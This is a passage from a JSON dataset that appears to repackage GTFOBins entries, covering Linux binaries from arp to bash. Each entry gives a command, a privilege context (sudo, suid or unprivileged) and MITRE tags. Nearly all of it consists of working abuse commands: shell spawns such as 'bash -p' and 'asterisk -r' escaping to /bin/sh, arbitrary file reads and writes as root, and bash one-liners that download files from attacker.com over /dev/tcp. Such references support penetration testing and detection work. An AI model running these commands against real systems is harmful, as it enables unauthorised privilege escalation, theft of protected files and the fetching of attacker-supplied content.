leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/arp/"]},{"id":"gtfo:arp:file-read:0:unprivileged","toolId":"gtfo:arp","toolName":"arp","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"arp -v -f /path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/arp/"]},{"id":"gtfo:as:file-read:0:sudo","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/as/"]},{"id":"gtfo:as:file-read:0:suid","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/as/"]},{"id":"gtfo:as:file-read:0:unprivileged","toolId":"gtfo:as","toolName":"as","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"as @/path/to/input-file","description":"Lines are likely leaked as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/as/"]},{"id":"gtfo:ascii-xfr:file-read:0:sudo","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"]},{"id":"gtfo:ascii-xfr:file-read:0:suid","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"]},{"id":"gtfo:ascii-xfr:file-read:0:unprivileged","toolId":"gtfo:ascii-xfr","toolName":"ascii-xfr","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii-xfr -ns /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii-xfr/"]},{"id":"gtfo:ascii85:file-read:0:sudo","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ascii85/"]},{"id":"gtfo:ascii85:file-read:0:unprivileged","toolId":"gtfo:ascii85","toolName":"ascii85","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ascii85 /path/to/input-file | ascii85 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ascii85/"]},{"id":"gtfo:ash:file-write:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:file-write:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:file-write:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:shell:0:sudo","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:shell:0:suid","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ash -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:ash:shell:0:unprivileged","toolId":"gtfo:ash","toolName":"ash","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ash","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ash/"]},{"id":"gtfo:aspell:file-read:0:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:0:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:0:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell -c /path/to/input-file","description":"The textual file is displayed in an interactive TUI showing only the parts that contain mispelled words.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:1:sudo","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:1:suid","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:aspell:file-read:1:unprivileged","toolId":"gtfo:aspell","toolName":"aspell","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aspell --conf /path/to/input-file","description":"The first word is likely displayed as error messaged, and converted to lowercase.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aspell/"]},{"id":"gtfo:asterisk:shell:0:sudo","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/asterisk/"]},{"id":"gtfo:asterisk:shell:0:suid","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/asterisk/"]},{"id":"gtfo:asterisk:shell:0:unprivileged","toolId":"gtfo:asterisk","toolName":"asterisk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"asterisk -r\n!/bin/sh","description":"A server instance must be already running, otherwise it can be started with `sudo asterisk -F`. Moreover, the invoking user must be able to access the socket.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/asterisk/"]},{"id":"gtfo:at:command:0:sudo","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:at:command:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"echo /path/to/command | at now","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:at:shell:0:sudo","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:at:shell:0:unprivileged","toolId":"gtfo:at","toolName":"at","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo \"/bin/sh <$(tty) >$(tty) 2>$(tty)\" | at now; tail -f /dev/null","description":"`tail` is used to pause the terminal.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/at/"]},{"id":"gtfo:atobm:file-read:0:sudo","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/atobm/"]},{"id":"gtfo:atobm:file-read:0:suid","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/atobm/"]},{"id":"gtfo:atobm:file-read:0:unprivileged","toolId":"gtfo:atobm","toolName":"atobm","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"atobm /path/to/input-file","description":"Outputs only the first line of the file to standard error without the `-` and `#` characters, this can be customized with the `-c` option, by default is `-c -#`. Content can be retrieved with `awk -F \"'\" '{printf \"%s\", $2}'`.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/atobm/"]},{"id":"gtfo:autoconf:shell:0:sudo","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoconf/"]},{"id":"gtfo:autoconf:shell:0:unprivileged","toolId":"gtfo:autoconf","toolName":"autoconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo /bin/sh >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoconf","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoconf/"]},{"id":"gtfo:autoheader:shell:0:sudo","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoheader/"]},{"id":"gtfo:autoheader:shell:0:unprivileged","toolId":"gtfo:autoheader","toolName":"autoheader","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\ntouch configure.ac\nAUTOM4TE=/path/to/temp-file autoheader","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoheader/"]},{"id":"gtfo:autoreconf:shell:0:sudo","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/autoreconf/"]},{"id":"gtfo:autoreconf:shell:0:unprivileged","toolId":"gtfo:autoreconf","toolName":"autoreconf","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo '/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\necho AC_INIT >configure.ac\nAUTOM4TE=/path/to/temp-file autoreconf","description":"The shell is invoked multiple times.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/autoreconf/"]},{"id":"gtfo:aws:file-read:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:file-read:0:suid","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:file-read:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"aws ec2 describe-instances --filter file:///path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:inherit:0:sudo","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:aws:inherit:0:unprivileged","toolId":"gtfo:aws","toolName":"aws","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"aws help","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/aws/"]},{"id":"gtfo:base32:file-read:0:sudo","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base32/"]},{"id":"gtfo:base32:file-read:0:suid","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base32/"]},{"id":"gtfo:base32:file-read:0:unprivileged","toolId":"gtfo:base32","toolName":"base32","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base32 /path/to/input-file | base32 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base32/"]},{"id":"gtfo:base58:file-read:0:sudo","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base58/"]},{"id":"gtfo:base58:file-read:0:unprivileged","toolId":"gtfo:base58","toolName":"base58","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base58 /path/to/input-file | base58 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base58/"]},{"id":"gtfo:base64:file-read:0:sudo","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/base64/"]},{"id":"gtfo:base64:file-read:0:suid","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/base64/"]},{"id":"gtfo:base64:file-read:0:unprivileged","toolId":"gtfo:base64","toolName":"base64","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"base64 /path/to/input-file | base64 --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/base64/"]},{"id":"gtfo:basenc:file-read:0:sudo","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basenc/"]},{"id":"gtfo:basenc:file-read:0:suid","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basenc/"]},{"id":"gtfo:basenc:file-read:0:unprivileged","toolId":"gtfo:basenc","toolName":"basenc","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basenc --base64 /path/to/input-file | basenc -d --base64","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basenc/"]},{"id":"gtfo:basez:file-read:0:sudo","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/basez/"]},{"id":"gtfo:basez:file-read:0:suid","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/basez/"]},{"id":"gtfo:basez:file-read:0:unprivileged","toolId":"gtfo:basez","toolName":"basez","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"basez /path/to/input-file | basez --decode","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/basez/"]},{"id":"gtfo:bash:download:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c '{ echo -ne \"GET /path/to/input-file HTTP/1.0\\r\\nhost: attacker.com\\r\\n\\r\\n\" 1>&3; cat 0<&3; } \\\n 3<>/dev/tcp/attacker.com/12345 \\\n | { while read -r; do [ \"$REPLY\" = \"$(echo -ne \"\\r\")\" ] && break; done; cat; } >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"bash -p -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:download:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"download","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Download"],"nativeCategory":["download"],"command":"bash -c 'echo \"$(</dev/tcp/attacker.com/12345) >/path/to/output-file'","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"bash -p -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"bash -c 'echo \"$(</path/to/input-file)\"'","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-read:1:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"HISTTIMEFORMAT=$'\\r\\e[K'\nhistory -c\nhistory -r /path/to/input-file\nhistory","description":"This only works interactively from an existing `bash` session.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:0:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:0:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"bash -p -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:0:unprivileged","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"bash -c 'echo DATA >/path/to/output-file'","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:1:sudo","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory -c\nDATA\nhistory -w /path/to/output-file","description":"This only works interactively from an existing `bash` session. It adds timestamps to the output file.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/bash/"]},{"id":"gtfo:bash:file-write:1:suid","toolId":"gtfo:bash","toolName":"bash","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"HISTIGNORE='history *'\nhistory 